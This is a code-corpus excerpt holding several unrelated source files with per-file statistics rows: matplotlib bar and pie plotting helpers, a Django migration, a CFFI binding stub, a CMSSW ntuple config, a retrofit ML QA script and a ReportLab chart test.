va='top',
ha='center'
)
percent = f'{(100 * float(count) / counts.sum()):0.0f} %'
ax.annotate(
text=percent,
xy=(x, 0),
xytext=(0, -32),
xycoords=(
'data',
'axes fraction'
),
textcoords='offset points',
va='top',
ha='center'
)
return (fig, ax)
def plot_horizontal_bars(
y: Union[List[int], List[float], List[str]],
width: Union[List[int], List[float]],
*,
height: Optional[float] = 0.8,
figsize: Optional[Tuple[int, int]] = (8, 6),
edgecolor: Optional[str] = '#ffffff',
linewidth: Optional[int] = 1,
color: Optional[str] = '#0077bb'
) -> Tuple[plt.Figure, axes.Axes]:
"""
Parameters
----------
y : Union[List[int], List[float], List[str]],
The y coordinates of the bars.
width : Union[List[int], List[float]],
The width(s) of the bars.
height : Optional[float] = 0.8,
The height of the bars.
figsize : Optional[Tuple[int, int]] = (8, 6),
The figure size width, height (inch).
edgecolor : Optional[str] = '#ffffff',
The hexadecimal color value for the bar edges.
linewidth : Optional[int] = 1,
The bar edges line width (point).
color : Optional[str] = '#0077bb'
The color of the bar faces.
Returns
-------
fig, ax : Tuple[plt.Figure, axes.Axes]
Examples
--------
Example 1
>>> import datasense as ds
>>> y = ['Yes', 'No']
>>> width = [69, 31]
>>> fig, ax = ds.plot_horizontal_bars(
>>> y=y,
>>> width=width
>>> )
Example 2
>>> y = ['Yes', 'No']
>>> width = [69, 31]
>>> fig, ax = ds.plot_horizontal_bars(
>>> y=y,
>>> width=width,
>>>> height=0.4
>>> )
"""
fig = plt.figure(figsize=figsize)
ax = fig.add_subplot(111)
ax.barh(
y=y,
width=width,
height=height,
edgecolor=edgecolor,
linewidth=linewidth,
color=color
)
return (fig, ax)
def plot_vertical_bars(
x: Union[List[int], List[float], List[str]],
height: Union[List[int], List[float]],
*,
width: Optional[float] = 0.8,
figsize: Optional[Tuple[int, int]] = (8, 6),
edgecolor: Optional[str] = '#ffffff',
linewidth: Optional[int] = 1,
color: Optional[str] = '#0077bb'
) -> Tuple[plt.Figure, axes.Axes]:
"""
Parameters
----------
x : Union[List[int], List[float], List[str]],
The x coordinates of the bars.
height : Union[List[int], List[float]],
The height(s) of the bars.
width : Optional[float] = 0.8,
The width of the bars.
figsize : Optional[Tuple[int, int]] = (8, 6),
The figure size width, height (inch).
edgecolor : Optional[str] = '#ffffff',
The hexadecimal color value for the bar edges.
linewidth : Optional[int] = 1,
The bar edges line width (point).
color : Optional[str] = '#0077bb'
The color of the bar faces.
Returns
-------
fig, ax : Tuple[plt.Figure, axes.Axes]
Examples
--------
Example 1
>>> import datasense as ds
>>> x = ['Yes', 'No']
>>> height = [69, 31]
>>> fig, ax = ds.plot_vertical_bars(
>>> x=x,
>>> height=height
>>> )
Example 2
>>> x = ['Yes', 'No']
>>> height = [69, 31]
>>> fig, ax = ds.plot_vertical_bars(
>>> x=x,
>>> height=height,
>>>> width=0.4
>>> )
"""
fig = plt.figure(figsize=figsize)
ax = fig.add_subplot(111)
ax.bar(
x=x,
height=height,
width=width,
edgecolor=edgecolor,
linewidth=linewidth,
color=color
)
return (fig, ax)
def plot_pie(
x: Union[List[int], List[float]],
labels: Union[List[int], List[float], List[str]],
*,
figsize: Optional[Tuple[int, int]] = (8, 6),
startangle: Optional[float] = 0,
colors: Optional[List[str]] = None,
autopct: Optional[str] = '%1.1f%%'
) -> Tuple[plt.Figure, axes.Axes]:
"""
Parameters
----------
x : Union[List[int], List[float]],
The wedge sizes.
labels : Union[List[int], List[float], List[str]],
The labels of the wedges.
startangle : Optional[float] = 0,
The start angle of the pie, counterclockwise from the x axis.
colors : Optional[List[str]] = None
The color of the wedges.
autopct : str
Label the wedges with their numeric value. If None, no label.
Returns
-------
fig, ax : Tuple[plt.Figure, axes.Axes]
Examples
--------
Example 1
>>> import datasense as ds
>>> x = [69, 31]
>>> labels = ['Yes', 'No']
>>> fig, ax = ds.plot_pie(
>>> x=x,
>>> labels=labels
>>> )
Example 2
>>> x = [69, 31]
>>> labels = ['Yes', 'No']
>>> fig, ax = ds.plot_pie(
>>> x=x,
>>> labels=labels,
>>> startangle=90,
>>> colors=[
>>> '#0077bb', '#33bbee', '#009988', '#ee7733', '#cc3311',
>>> '#ee3377', '#bbbbbb'
>>> ]
>>> )
"""
fig = plt.figure(figsize=figsize)
ax = fig.add_subplot(111)
ax.pie(
x=x,
labels=labels,
startangle=startangle,
colors=colors,
autopct=autopct
)
return (fig, ax)
def plot_stacked_bars(
x: Union[List[int], List[float], List[str]],
height1: Union[List[int], List[float]],
label1: Optional[str] = None,
*,
height2: Union[List[int], List[float]] = None,
label2: Optional[str] = None,
height3: Union[List[int], List[float]] = None,
label3: Optional[str] = None,
height4: Union[List[int], List[float]] = None,
label4: Optional[str] = None,
height5: Union[List[int], List[float]] = None,
label5: Optional[str] = None,
height6: Union[List[int], List[float]] = None,
label6: Optional[str] = None,
height7: Union[List[int], List[float]] = None,
label7: Optional[str] = None,
width: Optional[float] = 0.8,
figsize: Optional[Tuple[int, int]] = (8, 6),
color: Union[List[str]] = [
'#0077bb', '#33bbee', '#009988', '#ee7733', '#cc3311',
'#ee3377', '#bbbbbb'
]
) -> Tuple[plt.Figure, axes.Axes]:
"""
Stacked vertical bar plot of up to seven levels per bar.
Parameters
----------
x : Union[List[int], List[float], List[str]],
The x coordinates of the bars.
height1 : Union[List[int], List[float]],
The height of the level 1 bars.
label1: Optional[str] = None,
The label of the level 1 bars.
height2 : Union[List[int], List[float]],
The height of the level 2 bars.
label2: Optional[str] = None,
The label of the level 2 bars.
height3 : Union[List[int], List[float]],
The height of the level 3 bars.
label3: Optional[str] = None,
The label of the level 3 bars.
height4 : Union[List[int], List[float]],
The height of the level 4 bars.
label4: Optional[str] = None,
The label of the level 4 bars.
height5 : Union[List[int], List[float]],
The height of the level 5 bars.
label5: Optional[str] = None,
The label of the level 5 bars.
height6 : Union[List[int], List[float]],
The height of the level 6 bars.
label6: Optional[str] = None,
The label of the level 6 bars.
height7 : Union[List[int], List[float]],
The height of the level 7 bars.
label7: Optional[str] = None,
The label of the level 7 bars.
width : Optional[float] = 0.8,
The width of the bars.
figsize : Optional[Tuple[int, int]] = (8, 6),
The figure size width, height (inch).
color: Optional[str] = [
'#0077bb', '#33bbee', '#009988', '#ee7733', '#cc3311',
'#ee3377', '#bbbbbb'
]
The color of the bar faces, up to seven levels.
Returns
-------
fig, ax : Tuple[plt.Figure, axes.Axes]
Examples
--------
Example 1
>>> x = ['G1', 'G2', 'G3', 'G4', 'G5']
>>> height1 = [20, 35, 30, 35, 27]
>>> label1 = 'A'
>>> width = 0.35
>>> height2 = [25, 32, 34, 20, 25]
>>> label2 = 'B'
>>> fig, ax = ds.plot_stacked_bars(
>>> x=x,
>>> height1=height1,
>>> label1=label1,
>>> height2=height2,
>>> label2=label2
>>> )
>>> fig.legend(frameon=False, loc='upper right')
Example 2
>>> x = ['G1', 'G2', 'G3', 'G4', 'G5']
>>> height1 = [20, 35, 30, 35, 27]
>>> label1 = 'A'
>>> width = 0.35
>>> height2 = [25, 32, 34, 20, 25]
>>> label2 = 'B'
>>> height3 = [30, 34, 23, 27, 32]
>>> label3 = 'C'
>>> height4 = [30, 34, 23, 27, 32]
>>> label4 = 'D'
>>> height5 = [30, 34, 23, 27, 32]
>>> label5 = 'E'
>>> height6 = [30, 34, 23, 27, 32]
>>> label6 = 'F'
>>> height7 = [30, 34, 23, 27, 32]
>>> label7 = 'G'
>>> fig, ax = ds.plot_stacked_bars(
>>> x=x,
>>> height1=height1,
>>> label1=label1,
>>> width=width,
>>> figsize=(9, 6),
>>> height2=height2,
>>> label2=label2,
>>> height3=height3,
>>> label3=label3,
>>> height4=height4,
>>> label4=label4,
>>> height5=height5,
>>> label5=label5,
>>> height6=height6,
>>> label6=label6,
>>> height7=height7,
>>> label7=label7,
>>> )
>>> fig.legend(frameon=False, loc='upper right')
"""
fig = plt.figure(figsize=figsize)
ax = fig.add_subplot(111)
ax.bar(
x=x,
height=height1,
label=label1,
width=width,
color=color[0]
)
if label2:
ax.bar(
x=x,
height=height2,
label=label2,
width=width,
bottom=height1,
color=color[1]
)
if label3:
bottom = np.add(
height1, height2
).tolist()
ax.bar(
x=x,
height=height3,
label=label3,
width=width,
bottom=bottom,
color=color[2]
)
if label4:
bottom = np.add(
bottom, height3
).tolist()
ax.bar(
x=x,
height=height4,
label=label4,
width=width,
bottom=bottom,
color=color[3]
)
if label5:
bottom = np.add(
bottom, height4
).tolist()
ax.bar(
x=x,
height=height5,
label=label5,
width=width,
bottom=bottom,
color=color[4]
)
if label6:
bottom = np.add(
bottom, height5
).tolist()
ax.bar(
x=x,
height=height6,
label=label6,
width=width,
bottom=bottom,
color=color[5]
)
if label7:
bottom = np.add(
bottom, height6
).tolist()
ax.bar(
x=x,
height=height7,
label=label7,
width=width,
bottom=bottom,
color=color[6]
)
return (fig, ax)
__all__ = (
'plot_scatter_y',
'plot_scatter_x_y',
'plot_line_y',
'plot_line_x_y',
'plot_scatter_scatter_x_y1_y2',
'plot_scatter_scatter_x1_x2_y1_y2',
'plot_scatter_line_x_y1_y2',
'plot_line_line_y1_y2',
'plot_line_line_x_y1_y2',
'plot_line_line_line_x_y1_y2_y3',
'plot_scatterleft_scatterright_x_y1_y2',
'plot_lineleft_lineright_x_y1_y2',
'plot_barleft_lineright_x_y1_y2',
'plot_pareto',
'format_dates',
'probability_plot',
'despine',
'plot_histogram',
'plot_horizontal_bars',
'plot_vertical_bars',
'plot_pie',
'plot_stacked_bars',
)
| 28.419966 | 78 | 0.547244 | 8,048 | 67,469 | 4.510313 | 0.051938 | 0.049698 | 0.027687 | 0.01686 | 0.880768 | 0.853908 | 0.815394 | 0.799912 | 0.760875 | 0.751371 | 0 | 0.036719 | 0.33116 | 67,469 | 2,373 | 79 | 28.431943 | 0.767673 | 0.455128 | 0 | 0.744574 | 0 | 0 | 0.048242 | 0.008389 | 0 | 0 | 0 | 0.000421 | 0 | 1 | 0.018364 | false | 0 | 0.008347 | 0 | 0.043406 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 7 |
4f7f74d48a25a234be7f07170389204d1e334d03 | 5,319 | py | Python | usersec/migrations/0005_hpcgroupchangerequest_editor_and_more.py | bihealth/hpc-access | ff606b18b18230af2876a791ca706d3b24addb59 | [
"MIT"
] | null | null | null | usersec/migrations/0005_hpcgroupchangerequest_editor_and_more.py | bihealth/hpc-access | ff606b18b18230af2876a791ca706d3b24addb59 | [
"MIT"
] | 27 | 2022-02-11T15:51:24.000Z | 2022-03-31T12:11:20.000Z | usersec/migrations/0005_hpcgroupchangerequest_editor_and_more.py | bihealth/hpc-access | ff606b18b18230af2876a791ca706d3b24addb59 | [
"MIT"
] | null | null | null | # Generated by Django 4.0.2 on 2022-03-24 14:50
from django.conf import settings
from django.db import migrations, models
import django.db.models.deletion
class Migration(migrations.Migration):
dependencies = [
migrations.swappable_dependency(settings.AUTH_USER_MODEL),
(
"usersec",
"0004_remove_hpcgroupcreaterequest_delegate_email_and_more",
),
]
operations = [
migrations.AddField(
model_name="hpcgroupchangerequest",
name="editor",
field=models.ForeignKey(
help_text="User editing the request",
null=True,
on_delete=django.db.models.deletion.SET_NULL,
related_name="%(class)s_editor",
to=settings.AUTH_USER_MODEL,
),
),
migrations.AddField(
model_name="hpcgroupchangerequestversion",
name="editor",
field=models.ForeignKey(
help_text="User editing the request",
null=True,
on_delete=django.db.models.deletion.SET_NULL,
related_name="%(class)s_editor",
to=settings.AUTH_USER_MODEL,
),
),
migrations.AddField(
model_name="hpcgroupcreaterequest",
name="editor",
field=models.ForeignKey(
help_text="User editing the request",
null=True,
on_delete=django.db.models.deletion.SET_NULL,
related_name="%(class)s_editor",
to=settings.AUTH_USER_MODEL,
),
),
migrations.AddField(
model_name="hpcgroupcreaterequestversion",
name="editor",
field=models.ForeignKey(
help_text="User editing the request",
null=True,
on_delete=django.db.models.deletion.SET_NULL,
related_name="%(class)s_editor",
to=settings.AUTH_USER_MODEL,
),
),
migrations.AddField(
model_name="hpcgroupdeleterequest",
name="editor",
field=models.ForeignKey(
help_text="User editing the request",
null=True,
on_delete=django.db.models.deletion.SET_NULL,
related_name="%(class)s_editor",
to=settings.AUTH_USER_MODEL,
),
),
migrations.AddField(
model_name="hpcgroupdeleterequestversion",
name="editor",
field=models.ForeignKey(
help_text="User editing the request",
null=True,
on_delete=django.db.models.deletion.SET_NULL,
related_name="%(class)s_editor",
to=settings.AUTH_USER_MODEL,
),
),
migrations.AddField(
model_name="hpcuserchangerequest",
name="editor",
field=models.ForeignKey(
help_text="User editing the request",
null=True,
on_delete=django.db.models.deletion.SET_NULL,
related_name="%(class)s_editor",
to=settings.AUTH_USER_MODEL,
),
),
migrations.AddField(
model_name="hpcuserchangerequestversion",
name="editor",
field=models.ForeignKey(
help_text="User editing the request",
null=True,
on_delete=django.db.models.deletion.SET_NULL,
related_name="%(class)s_editor",
to=settings.AUTH_USER_MODEL,
),
),
migrations.AddField(
model_name="hpcusercreaterequest",
name="editor",
field=models.ForeignKey(
help_text="User editing the request",
null=True,
on_delete=django.db.models.deletion.SET_NULL,
related_name="%(class)s_editor",
to=settings.AUTH_USER_MODEL,
),
),
migrations.AddField(
model_name="hpcusercreaterequestversion",
name="editor",
field=models.ForeignKey(
help_text="User editing the request",
null=True,
on_delete=django.db.models.deletion.SET_NULL,
related_name="%(class)s_editor",
to=settings.AUTH_USER_MODEL,
),
),
migrations.AddField(
model_name="hpcuserdeleterequest",
name="editor",
field=models.ForeignKey(
help_text="User editing the request",
null=True,
on_delete=django.db.models.deletion.SET_NULL,
related_name="%(class)s_editor",
to=settings.AUTH_USER_MODEL,
),
),
migrations.AddField(
model_name="hpcuserdeleterequestversion",
name="editor",
field=models.ForeignKey(
help_text="User editing the request",
null=True,
on_delete=django.db.models.deletion.SET_NULL,
related_name="%(class)s_editor",
to=settings.AUTH_USER_MODEL,
),
),
]
| 34.993421 | 72 | 0.529423 | 481 | 5,319 | 5.636175 | 0.135135 | 0.041313 | 0.067134 | 0.105496 | 0.777942 | 0.777942 | 0.777942 | 0.777942 | 0.777942 | 0.777942 | 0 | 0.005723 | 0.375823 | 5,319 | 151 | 73 | 35.225166 | 0.810843 | 0.00846 | 0 | 0.834483 | 1 | 0 | 0.171472 | 0.054059 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.02069 | 0 | 0.041379 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 1 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 7 |
4f80022b5ed458f70ccb34509ef4da6f1d2d7c2f | 457 | py | Python | kapitan_helm/helm_binding.py | chrisglass/kapitan-helm-bindings | 05de57d0b75c372d2b50cf245bce3dbc72d96c23 | [
"Apache-2.0"
] | 2 | 2020-10-25T10:25:15.000Z | 2020-10-25T12:16:12.000Z | kapitan_helm/helm_binding.py | chrisglass/kapitan-helm-bindings | 05de57d0b75c372d2b50cf245bce3dbc72d96c23 | [
"Apache-2.0"
] | null | null | null | kapitan_helm/helm_binding.py | chrisglass/kapitan-helm-bindings | 05de57d0b75c372d2b50cf245bce3dbc72d96c23 | [
"Apache-2.0"
] | null | null | null | # auto-generated file
import _cffi_backend
ffi = _cffi_backend.FFI('kapitan_helm.helm_binding',
_version = 0x2601,
_types = b'\x00\x00\x01\x0D\x00\x00\x0D\x03\x00\x00\x01\x11\x00\x00\x01\x11\x00\x00\x01\x11\x00\x00\x01\x11\x00\x00\x01\x11\x00\x00\x01\x03\x00\x00\x07\x01\x00\x00\x00\x0F\x00\x00\x0E\x0D\x00\x00\x0E\x03\x00\x00\x00\x0F\x00\x00\x02\x01\x00\x00\x00\x01',
_globals = (b'\x00\x00\x0A\x23free',0,b'\x00\x00\x00\x23renderChart',0),
)
| 50.777778 | 257 | 0.724289 | 91 | 457 | 3.538462 | 0.307692 | 0.391304 | 0.223602 | 0.186335 | 0.326087 | 0.326087 | 0.214286 | 0.214286 | 0.214286 | 0.214286 | 0 | 0.316901 | 0.067834 | 457 | 8 | 258 | 57.125 | 0.438967 | 0.041575 | 0 | 0 | 1 | 0.166667 | 0.715596 | 0.669725 | 0 | 1 | 0.013761 | 0 | 0 | 1 | 0 | false | 0 | 0.166667 | 0 | 0.166667 | 0 | 0 | 0 | 0 | null | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 1 | 0 | 0 | 1 | 0 | 0 | 0 | 1 | 0 | 1 | 1 | null | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 10 |
8b118801c16cb4610dae59fb109ae183e785ba62 | 1,423 | py | Python | python/Ntuple_cff.py | jjacob/NTupleProduction | 5bd3b925a1cdec8a4e1332357becfaba04b7c1c9 | [
"Apache-2.0"
] | null | null | null | python/Ntuple_cff.py | jjacob/NTupleProduction | 5bd3b925a1cdec8a4e1332357becfaba04b7c1c9 | [
"Apache-2.0"
] | null | null | null | python/Ntuple_cff.py | jjacob/NTupleProduction | 5bd3b925a1cdec8a4e1332357becfaba04b7c1c9 | [
"Apache-2.0"
] | null | null | null | import FWCore.ParameterSet.Config as cms
from BristolAnalysis.NTupleTools.BristolNTuple_BeamSpot_cfi import *
from BristolAnalysis.NTupleTools.BristolNTuple_Event_cfi import *
from BristolAnalysis.NTupleTools.BristolNTuple_CaloJets_cfi import *
from BristolAnalysis.NTupleTools.BristolNTuple_PFJets_cfi import *
from BristolAnalysis.NTupleTools.BristolNTuple_Electrons_cfi import *
from BristolAnalysis.NTupleTools.BristolNTuple_MET_cfi import *
from BristolAnalysis.NTupleTools.BristolNTuple_RecoMET_cfi import *
from BristolAnalysis.NTupleTools.BristolNTuple_METcorrections_cfi import *
from BristolAnalysis.NTupleTools.BristolNTuple_Muons_cfi import *
from BristolAnalysis.NTupleTools.BristolNTuple_Trigger_cfi import *
from BristolAnalysis.NTupleTools.BristolNTuple_TriggerObjects_cfi import *
from BristolAnalysis.NTupleTools.BristolNTuple_Vertex_cfi import *
from BristolAnalysis.NTupleTools.BristolNTuple_GenEventInfo_cfi import *
from BristolAnalysis.NTupleTools.BristolNTuple_GenParticles_cfi import *
from BristolAnalysis.NTupleTools.BristolNTuple_GenJets_cfi import *
from BristolAnalysis.NTupleTools.BristolNTuple_GenMET_cfi import *
from BristolAnalysis.NTupleTools.BristolNTuple_Tracks_cfi import *
from BristolAnalysis.NTupleTools.BristolNTuple_Photons_cfi import *
from BristolAnalysis.NTupleTools.BristolNTuple_Taus_cfi import *
from BristolAnalysis.NTupleTools.BristolNTuple_GlobalEventVars_cfi import *
| 61.869565 | 75 | 0.896697 | 146 | 1,423 | 8.465753 | 0.212329 | 0.307443 | 0.485437 | 0.695793 | 0.799353 | 0.799353 | 0 | 0 | 0 | 0 | 0 | 0 | 0.059733 | 1,423 | 22 | 76 | 64.681818 | 0.923767 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0 | 0 | 0 | 0 | null | 1 | 1 | 1 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 7 |
8cbb1f6fcedab2346dad20c47d466f58266ed060 | 5,492 | py | Python | tests/MachineLearning_QA.py | SeanBenner/RetroFit | 1417775c2154c2127b3dedaf133f8f21d5f1adfa | [
"MIT"
] | null | null | null | tests/MachineLearning_QA.py | SeanBenner/RetroFit | 1417775c2154c2127b3dedaf133f8f21d5f1adfa | [
"MIT"
] | null | null | null | tests/MachineLearning_QA.py | SeanBenner/RetroFit | 1417775c2154c2127b3dedaf133f8f21d5f1adfa | [
"MIT"
] | null | null | null | ############################################################################################
# ML0_GetModelData Example
############################################################################################
import datatable as dt
from datatable import sort, f, by
import retrofit
from retrofit import FeatureEngineering as fe
from retrofit import MachineLearning as ml
# CatBoost
# Load some data
data = dt.fread("C:/Users/Bizon/Documents/GitHub/BenchmarkData.csv")
# Create partitioned data sets
DataSets = fe.FE2_AutoDataParition(
data=data,
ArgsList=None,
DateColumnName='CalendarDateColumn',
PartitionType='random',
Ratios=[0.70,0.20,0.10],
ByVariables=None,
Processing='datatable',
InputFrame='datatable',
OutputFrame='datatable')
# Collect partitioned data
TrainData = DataSets['TrainData']
ValidationData = DataSets['ValidationData']
TestData = DataSets['TestData']
del DataSets
# Create catboost data sets
DataSets = ml.ML0_GetModelData(
TrainData=TrainData,
ValidationData=ValidationData,
TestData=TestData,
ArgsList=None,
TargetColumnName='Leads',
NumericColumnNames=['XREGS1', 'XREGS2', 'XREGS3'],
CategoricalColumnNames=['MarketingSegments','MarketingSegments2','MarketingSegments3','Label'],
TextColumnNames=None,
WeightColumnName=None,
Threads=-1,
Processing='catboost',
InputFrame='datatable')
# Collect catboost training data
catboost_train = DataSets['train_data']
catboost_validation = DataSets['validation_data']
catboost_test = DataSets['test_data']
# QA: Group Case: Step through function
# TrainData=TrainData
# ValidationData=ValidationData
# TestData=TestData
# ArgsList=None
# TargetColumnName='Leads'
# NumericColumnNames=['XREGS1','XREGS2','XREGS3']
# CategoricalColumnNames=['MarketingSegments', 'MarketingSegments2', 'MarketingSegments3', 'Label']
# TextColumnNames=None
# WeightColumnName=None
# Threads=-1
# Processing='catboost'
# InputFrame='datatable'
# XGBoost
# Load some data
data = dt.fread("C:/Users/Bizon/Documents/GitHub/BenchmarkData.csv")
# Create partitioned data sets
DataSets = fe.FE2_AutoDataParition(
data=data,
ArgsList=None,
DateColumnName='CalendarDateColumn',
PartitionType='random',
Ratios=[0.70,0.20,0.10],
ByVariables=None,
Processing='datatable',
InputFrame='datatable',
OutputFrame='datatable')
# Collect partitioned data
TrainData = DataSets['TrainData']
ValidationData = DataSets['ValidationData']
TestData = DataSets['TestData']
del DataSets
# Create xgboost data sets
DataSets = ml.ML0_GetModelData(
TrainData=TrainData,
ValidationData=ValidationData,
TestData=TestData,
ArgsList=None,
TargetColumnName='Leads',
NumericColumnNames=['XREGS1', 'XREGS2', 'XREGS3'],
CategoricalColumnNames=['MarketingSegments','MarketingSegments2','MarketingSegments3','Label'],
TextColumnNames=None,
WeightColumnName=None,
Threads=-1,
Processing='xgboost',
InputFrame='datatable')
# Collect xgboost training data
xgboost_train = DataSets['train_data']
xgboost_validation = DataSets['validation_data']
xgboost_test = DataSets['test_data']
# QA: Group Case: Step through function
# TrainData=TrainData
# ValidationData=ValidationData
# TestData=TestData
# ArgsList=None
# TargetColumnName='Leads'
# NumericColumnNames=['XREGS1','XREGS2','XREGS3']
# CategoricalColumnNames=['MarketingSegments', 'MarketingSegments2', 'MarketingSegments3', 'Label']
# TextColumnNames=None
# WeightColumnName=None
# Threads=-1
# Processing='xgboost'
# InputFrame='datatable'
# LightGBM
# Load some data
data = dt.fread("C:/Users/Bizon/Documents/GitHub/BenchmarkData.csv")
# Create partitioned data sets
DataSets = fe.FE2_AutoDataParition(
data=data,
ArgsList=None,
DateColumnName='CalendarDateColumn',
PartitionType='random',
Ratios=[0.70,0.20,0.10],
ByVariables=None,
Processing='datatable',
InputFrame='datatable',
OutputFrame='datatable')
# Collect partitioned data
TrainData = DataSets['TrainData']
ValidationData = DataSets['ValidationData']
TestData = DataSets['TestData']
del DataSets
# Create lightgbm data sets
DataSets = ml.ML0_GetModelData(
TrainData=TrainData,
ValidationData=ValidationData,
TestData=TestData,
ArgsList=None,
TargetColumnName='Leads',
NumericColumnNames=['XREGS1', 'XREGS2', 'XREGS3'],
CategoricalColumnNames=['MarketingSegments','MarketingSegments2','MarketingSegments3','Label'],
TextColumnNames=None,
WeightColumnName=None,
Threads=-1,
Processing='lightgbm',
InputFrame='datatable')
# Collect lightgbm training data
lightgbm_train = DataSets['train_data']
lightgbm_validation = DataSets['validation_data']
lightgbm_test = DataSets['test_data']
# QA: Group Case: Step through function
# TrainData=TrainData
# ValidationData=ValidationData
# TestData=TestData
# ArgsList=None
# TargetColumnName='Leads'
# NumericColumnNames=['XREGS1','XREGS2','XREGS3']
# CategoricalColumnNames=['MarketingSegments', 'MarketingSegments2', 'MarketingSegments3', 'Label']
# TextColumnNames=None
# WeightColumnName=None
# Threads=-1
# Processing='lightgbm'
# InputFrame='datatable'
############################################################################################
# ML0_Parameters
############################################################################################
# Ftrl
Params = ML0_Parameters(Algorithm='Ftrl', TargetType='regression', TrainMethod='gridtune', Model=None)
print(Params)
print_list(Params)
| 28.455959 | 102 | 0.708667 | 496 | 5,492 | 7.790323 | 0.185484 | 0.02795 | 0.024845 | 0.071429 | 0.834886 | 0.834886 | 0.834886 | 0.834886 | 0.834886 | 0.834886 | 0 | 0.01473 | 0.109978 | 5,492 | 192 | 103 | 28.604167 | 0.775777 | 0.294064 | 0 | 0.80198 | 0 | 0 | 0.234919 | 0.042633 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.049505 | 0 | 0.049505 | 0.019802 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 7 |
8ce2baf2dae1e9093cb38e99acc82500e614dcfc | 10,135 | py | Python | tests/charts-out/test_graphics_charts_lineplots_sample1b.py | debragail/reportlab-mirror | 1e5814e1313ed50d5abb65487b207711cb4f7595 | [
"BSD-3-Clause"
] | 1 | 2020-05-21T23:34:55.000Z | 2020-05-21T23:34:55.000Z | tests/charts-out/test_graphics_charts_lineplots_sample1b.py | debragail/reportlab-mirror | 1e5814e1313ed50d5abb65487b207711cb4f7595 | [
"BSD-3-Clause"
] | null | null | null | tests/charts-out/test_graphics_charts_lineplots_sample1b.py | debragail/reportlab-mirror | 1e5814e1313ed50d5abb65487b207711cb4f7595 | [
"BSD-3-Clause"
] | null | null | null | #Autogenerated by ReportLab guiedit do not edit
from reportlab.graphics.shapes import _DrawingEditorMixin, Drawing, Group, Rect, Line, String, PolyLine, Circle
from reportlab.lib.colors import Color, CMYKColor, PCMYKColor
class ExplodedDrawing_Drawing(_DrawingEditorMixin,Drawing):
def __init__(self,width=400,height=200,*args,**kw):
Drawing.__init__(self,width,height,*args,**kw)
self.transform = (1,0,0,1,0,0)
self.add(Rect(50,50,300,125,rx=0,ry=0,fillColor=None,fillOpacity=None,strokeColor=Color(0,0,0,1),strokeWidth=1,strokeLineCap=0,strokeLineJoin=0,strokeMiterLimit=0,strokeDashArray=None,strokeOpacity=None))
self.add(Line(50,50,350,50,strokeColor=Color(0,0,0,1),strokeWidth=1,strokeLineCap=0,strokeLineJoin=0,strokeMiterLimit=0,strokeDashArray=None,strokeOpacity=None))
self.add(Line(110,50,110,45,strokeColor=Color(0,0,0,1),strokeWidth=1,strokeLineCap=0,strokeLineJoin=0,strokeMiterLimit=10,strokeDashArray=None,strokeOpacity=None))
self.add(Line(170,50,170,45,strokeColor=Color(0,0,0,1),strokeWidth=1,strokeLineCap=0,strokeLineJoin=0,strokeMiterLimit=10,strokeDashArray=None,strokeOpacity=None))
self.add(Line(200,50,200,45,strokeColor=Color(0,0,0,1),strokeWidth=1,strokeLineCap=0,strokeLineJoin=0,strokeMiterLimit=10,strokeDashArray=None,strokeOpacity=None))
self.add(Line(230,50,230,45,strokeColor=Color(0,0,0,1),strokeWidth=1,strokeLineCap=0,strokeLineJoin=0,strokeMiterLimit=10,strokeDashArray=None,strokeOpacity=None))
self.add(Line(290,50,290,45,strokeColor=Color(0,0,0,1),strokeWidth=1,strokeLineCap=0,strokeLineJoin=0,strokeMiterLimit=10,strokeDashArray=None,strokeOpacity=None))
self.add(Line(350,50,350,45,strokeColor=Color(0,0,0,1),strokeWidth=1,strokeLineCap=0,strokeLineJoin=0,strokeMiterLimit=10,strokeDashArray=None,strokeOpacity=None))
v0=self._nn(Group())
v0.transform = (1,0,0,1,110,45)
v0.add(String(-6.25,-10,'1.0',textAnchor='start',fontName='Times-Roman',fontSize=10,fillColor=Color(0,0,0,1)))
v0=self._nn(Group())
v0.transform = (1,0,0,1,170,45)
v0.add(String(-6.25,-10,'2.0',textAnchor='start',fontName='Times-Roman',fontSize=10,fillColor=Color(0,0,0,1)))
v0=self._nn(Group())
v0.transform = (1,0,0,1,200,45)
v0.add(String(-6.25,-10,'2.5',textAnchor='start',fontName='Times-Roman',fontSize=10,fillColor=Color(0,0,0,1)))
v0=self._nn(Group())
v0.transform = (1,0,0,1,230,45)
v0.add(String(-6.25,-10,'3.0',textAnchor='start',fontName='Times-Roman',fontSize=10,fillColor=Color(0,0,0,1)))
v0=self._nn(Group())
v0.transform = (1,0,0,1,290,45)
v0.add(String(-6.25,-10,'4.0',textAnchor='start',fontName='Times-Roman',fontSize=10,fillColor=Color(0,0,0,1)))
v0=self._nn(Group())
v0.transform = (1,0,0,1,350,45)
v0.add(String(-6.25,-10,'5.0',textAnchor='start',fontName='Times-Roman',fontSize=10,fillColor=Color(0,0,0,1)))
